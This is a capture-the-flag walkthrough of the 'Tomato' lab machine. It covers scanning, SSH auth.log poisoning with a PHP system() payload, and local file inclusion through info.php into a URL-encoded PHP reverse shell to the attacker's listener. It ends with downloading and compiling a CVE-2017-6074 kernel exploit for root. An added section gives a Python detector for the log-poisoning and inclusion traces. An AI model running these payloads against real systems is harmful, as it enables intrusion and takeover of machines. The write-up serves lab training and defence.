TOMATO

2023-02-01  Tess鱼丸

I. Network scan

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:eb:da:c6, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1    00:50:56:c0:00:08       VMware, Inc.
192.168.10.1    00:50:56:ff:c4:ee       VMware, Inc. (DUP: 2)
192.168.10.12   00:0c:29:bd:58:5d       VMware, Inc.
192.168.10.254  00:50:56:fa:e3:28       VMware, Inc.
                                                                 

II. Target port scan

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.10.12               
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-30 08:04 EST
Nmap scan report for 192.168.10.10
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
2211/tcp open  emwin
8888/tcp open  sun-answerbook
MAC Address: 00:0C:29:BD:58:5D (VMware)

┌──(root㉿kali)-[~]
└─# nmap -p21,80,2211,8888 -A 192.168.10.12
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-30 08:07 EST
Nmap scan report for 192.168.10.10
Host is up (0.00026s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tomato
|_http-server-header: Apache/2.4.18 (Ubuntu)
2211/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
|   256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_  256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 00:0C:29:BD:58:5D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.10.12

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds

III. Web information gathering

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.12 -f -e html.php.txt

  _|. _ _  _  _  _ _|_    v0.4.2                                                
 (_||| _) (/_(_|| (_| )                                                         
                                                                                
Extensions: html.php.txt | HTTP method: GET | Threads: 30 | Wordlist size: 13612

Output File: /root/.dirsearch/reports/192.168.10.12/_23-01-30_08-13-44.txt

Error Log: /root/.dirsearch/logs/errors-23-01-30_08-13-44.log

Target: http://192.168.10.12/

[08:13:44] Starting: 
[08:13:45] 403 -  278B  - /.ht_wsr.txt                                     
[08:13:45] 403 -  278B  - /.htaccess.save                                  
[08:13:45] 403 -  278B  - /.htaccess_orig
[08:13:45] 403 -  278B  - /.htaccess.bak1
[08:13:45] 403 -  278B  - /.htaccess.orig
[08:13:45] 403 -  278B  - /.htaccess.sample
[08:13:45] 403 -  278B  - /.htaccess_extra
[08:13:45] 403 -  278B  - /.htaccessOLD2
[08:13:45] 403 -  278B  - /.htaccess_sc
[08:13:45] 403 -  278B  - /.htm                                            
[08:13:45] 403 -  278B  - /.htaccessOLD
[08:13:45] 403 -  278B  - /.html                                           
[08:13:45] 403 -  278B  - /.htpasswds
[08:13:45] 403 -  278B  - /.httr-oauth
[08:13:45] 403 -  278B  - /.htpasswd_test
[08:13:45] 403 -  278B  - /.php                                            
[08:13:45] 403 -  278B  - /.php3                                           
[08:13:45] 403 -  278B  - /.htaccessBAK                                    
[08:13:59] 403 -  278B  - /icons/                                           
[08:14:00] 200 -  652B  - /index.html                                       
[08:14:08] 403 -  278B  - /server-status                                    
[08:14:08] 403 -  278B  - /server-status/                                       
                                                                                

Discovering hidden directories

┌──(root㉿kali)-[~]
└─# apt install seclists  
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成                 
下列【新】软件包将被安装:
  seclists


┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.12 -w /usr/share/seclists/Discovery/Web-Content/common.txt 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 4713

Output File: /root/.dirsearch/reports/192.168.10.12/_23-01-30_08-26-17.txt

Error Log: /root/.dirsearch/logs/errors-23-01-30_08-26-17.log

Target: http://192.168.10.12/

[08:26:17] Starting: 
[08:26:18] 301 -  322B  - /antibot_image  ->  http://192.168.10.12/antibot_image/
[08:26:20] 200 -  652B  - /index.html                                       
[08:26:24] 403 -  278B  - /server-status                                    
                                                                             
Task Completed                          
info.php is found to contain a file inclusion vulnerability.
┌──(root㉿kali)-[~]
└─# ssh '<?php system($_GET['shell']);?>'@192.168.10.12  
<?php system($_GET[shell]);?>@192.168.10.12's password: 
Permission denied, please try again.
<?php system($_GET[shell]);?>@192.168.10.12's password: 
Permission denied, please try again.
<?php system($_GET[shell]);?>@192.168.10.12's password: 
<?php system($_GET[shell]);?>@192.168.10.12: Permission denied (publickey,password).

This way, '<?php system($_GET['shell']); ?>' is written into the SSH log (/var/log/auth.log) as the attempted username.

Start an nc listener:
nc -lvnp 3388
Build the reverse shell request:
http://192.168.10.12/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php -r '$sock=fsockopen("192.168.10.100",3388);exec("/bin/sh -i <&3 >&3 2>&3");'
After URL encoding:
http://192.168.10.12/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php+-r+%27%24sock%3dfsockopen(%22192.168.10.100%22%2c3388)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
Visiting the URL returns a reverse shell:
┌──(root㉿kali)-[~]
└─# nc -lvnp 3388                          
listening on [any] 3388 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.10] 57358
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ 
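
Seen from the defender's side, the two steps above leave one trace each: a username in auth.log that is not an account name, and a web request whose parameter traverses into a log file. The following is an added example, not part of the original write-up; it flags both and correlates them by source IP. The log lines are constructed samples modelled on this session, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on the session above (not real logs).
AUTH_LOG = [
    "Jan 30 08:40:01 ubuntu sshd[1201]: Failed password for invalid user admin from 192.168.10.100 port 40122 ssh2",
    "Jan 30 08:41:12 ubuntu sshd[1207]: Invalid user <?php system($_GET[shell]);?> from 192.168.10.100",
    "Jan 30 08:41:15 ubuntu sshd[1207]: Failed password for invalid user <?php system($_GET[shell]);?> from 192.168.10.100 port 40130 ssh2",
]
ACCESS_LOG = [
    '192.168.10.100 - - [30/Jan/2023:08:45:10 -0500] "GET /index.html HTTP/1.1" 200 652',
    '192.168.10.100 - - [30/Jan/2023:08:46:02 -0500] "GET /antibot_image/antibots/info.php'
    '?image=..%2f..%2f..%2f..%2f..%2fvar%2flog%2fauth.log&shell=id HTTP/1.1" 200 4096',
]

SSHD_USER = re.compile(r"sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) "
                       r"(?P<user>.*) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})")
SAFE_USER = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}\$?$", re.I)  # plausible account name
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<uri>\S+)')
LOG_PATH = re.compile(r"/(?:var/log|proc/self)/")

def poisoned_auth_entries(lines):
    """(ip, username) pairs whose username field is not a plausible account name."""
    hits = []
    for line in lines:
        m = SSHD_USER.search(line)
        if m and not SAFE_USER.match(m["user"]) and (m["ip"], m["user"]) not in hits:
            hits.append((m["ip"], m["user"]))
    return hits

def lfi_log_requests(lines):
    """(ip, script) pairs for requests that traverse into a log or /proc path."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            # Decode twice so double-encoded traversal (%252e%252e%252f) is also seen.
            uri = unquote_plus(unquote_plus(m["uri"]))
            if "../" in uri and LOG_PATH.search(uri):
                hits.append((m["ip"], uri.split("?")[0]))
    return hits

def correlate(auth_lines, access_lines):
    """Source IPs seen both planting code in auth.log and including a log file."""
    planted = {ip for ip, _ in poisoned_auth_entries(auth_lines)}
    included = {ip for ip, _ in lfi_log_requests(access_lines)}
    return planted & included
```

On a default Ubuntu install auth.log is mode 0640 and owned by syslog:adm, so www-data cannot read it; the include succeeding here means those permissions had been loosened, which is the first setting to check.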

3. Privilege escalation

First, spawn an interactive shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
Check the Linux kernel version:
uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
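Look for an exploit for this kernel version.
Compile it and upload it to the target host. However, the precompiled file does not run after upload; it reports ./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found, because the binary was linked against the newer glibc on the machine where it was built.
The fix is to transfer the original .c source file to the target and compile it there before running it,
which yields root privileges.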

$
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/html/antibot_image/antibots$
www-data@ubuntu:/var/www/html/antibot_image/antibots$ cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.10.100:8000/CVE-2017-6074.c
wget http://192.168.10.100:8000/CVE-2017-6074.c
--2023-02-01 11:05:53--  http://192.168.10.100:8000/CVE-2017-6074.c
Connecting to 192.168.10.100:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/x-csrc]
Saving to: 'CVE-2017-6074.c'

CVE-2017-6074.c     100%[===================>]  16.17K  --.-KB/s    in 0s      

2023-02-01 11:05:53 (34.7 MB/s) - 'CVE-2017-6074.c' saved [16554/16554]

www-data@ubuntu:/tmp$ 
www-data@ubuntu:/tmp$ gcc CVE-2017-6074.c
gcc CVE-2017-6074.c
www-data@ubuntu:/tmp$ ./a.out
./a.out
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064560(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x402043
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don t kill the exploit binary, the kernel will crash
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:/tmp# whoami
whoami
root

root@ubuntu:/tmp# cd ~
cd ~
root@ubuntu:/root# ls
ls
0  gcc  glibc-2.34  proof.txt
root@ubuntu:/root# cat proof.txt
cat proof.txt
Sun_CSR_TEAM_TOMATO_JS_0232xx23
root@ubuntu:/root# 

